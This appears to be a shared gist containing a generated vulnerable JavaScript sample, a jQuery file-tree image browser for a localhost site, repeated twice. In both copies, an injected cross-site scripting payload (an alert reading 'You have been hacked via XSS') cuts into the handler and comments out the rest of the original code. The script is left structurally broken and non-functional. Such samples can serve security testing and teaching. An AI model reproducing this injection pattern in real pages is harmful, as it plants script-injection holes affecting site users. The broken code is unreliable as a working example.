VasilievSerg/SetupjQueryFileTreeScript_gen_vuln.js Secret

## SetupjQueryFileTreeScript_gen_vuln.js
<script type = "text/javascript" > function updateQueryStringParameter(uri, key, value) {
  var re = new RegExp("([?|&])" + key + "=.*?(&|$)", "i");
  separator = uri.indexOf('?') !== -1 ? "&" : "?";
  if (uri.match(re)) {
    return uri.replace(re, '$1' + key + "=" + value + '$2');
  } else {
    return uri + separator + key + "=" + value;
  }
}
$(document).ready(function () {
  $('#lnkImageCropper').hide();
  $('#pnlFileTree').fileTree({
    root: '~/Data/Sites/1/media/',
    loadMessage: 'Loading...',
    multiFolder: false,
    script: 'http://localhost:56987/Services/jqueryFileTreeMediaBrowser.ashx?type=image'
  }, function (file) {
    document.getElementById('hdnFileUrl').value = file;
    document.getElementById('txtSelection').value = file;
    document.getElementById('imgPreview').src = file;
    var imageCropperUrl = 'http://localhost:56987/Dialog/ImageCropperDialog.aspx';
    var selDir = document.getElementById('hdnFolder').value;
    var returnUrl = encodeURIComponent('http://localhost:56987/Dialog/FileDialog.aspx?ed=TestPayload');
  });
});
alert('You have been hacked via XSS'); //&type=image&dir=' + selDir) ; $('#lnkImageCropper').attr('href',imageCropperUrl + '?src=' + file + '&return=' + returnUrl); $('#lnkImageCropper').show(); }, function(folder) {document.getElementById('hdnFolder').value = folder; if(folder == 'root'){document.getElementById('hdnFolder').value = '~/Data/Sites/1/media/'; }});});$('#pnlFilesuploader').bind('fileuploadsubmit', function (e, data) {var fld = $('#hdnFolder'); var maxW = $('#txtMaxWidth'); var maxH = $('#txtMaxHeight'); var rz = $('#chkConstrainImageSize'); data.formData = {fld: fld.val(),maxW: maxW.val(),maxH: maxH.val(),rz: rz.is(':checked')}; });
</script>
	<script type = "text/javascript" > function updateQueryStringParameter(uri, key, value) {
	var re = new RegExp("([?\|&])" + key + "=.*?(&\|$)", "i");
	separator = uri.indexOf('?') !== -1 ? "&" : "?";
	if (uri.match(re)) {
	return uri.replace(re, '$1' + key + "=" + value + '$2');
	} else {
	return uri + separator + key + "=" + value;
	}
	}
	$(document).ready(function () {
	$('#lnkImageCropper').hide();
	$('#pnlFileTree').fileTree({
	root: '~/Data/Sites/1/media/',
	loadMessage: 'Loading...',
	multiFolder: false,
	script: 'http://localhost:56987/Services/jqueryFileTreeMediaBrowser.ashx?type=image'
	}, function (file) {
	document.getElementById('hdnFileUrl').value = file;
	document.getElementById('txtSelection').value = file;
	document.getElementById('imgPreview').src = file;
	var imageCropperUrl = 'http://localhost:56987/Dialog/ImageCropperDialog.aspx';
	var selDir = document.getElementById('hdnFolder').value;
	var returnUrl = encodeURIComponent('http://localhost:56987/Dialog/FileDialog.aspx?ed=TestPayload');
	});
	});
	alert('You have been hacked via XSS'); //&type=image&dir=' + selDir) ; $('#lnkImageCropper').attr('href',imageCropperUrl + '?src=' + file + '&return=' + returnUrl); $('#lnkImageCropper').show(); }, function(folder) {document.getElementById('hdnFolder').value = folder; if(folder == 'root'){document.getElementById('hdnFolder').value = '~/Data/Sites/1/media/'; }});});$('#pnlFilesuploader').bind('fileuploadsubmit', function (e, data) {var fld = $('#hdnFolder'); var maxW = $('#txtMaxWidth'); var maxH = $('#txtMaxHeight'); var rz = $('#chkConstrainImageSize'); data.formData = {fld: fld.val(),maxW: maxW.val(),maxH: maxH.val(),rz: rz.is(':checked')}; });
	</script>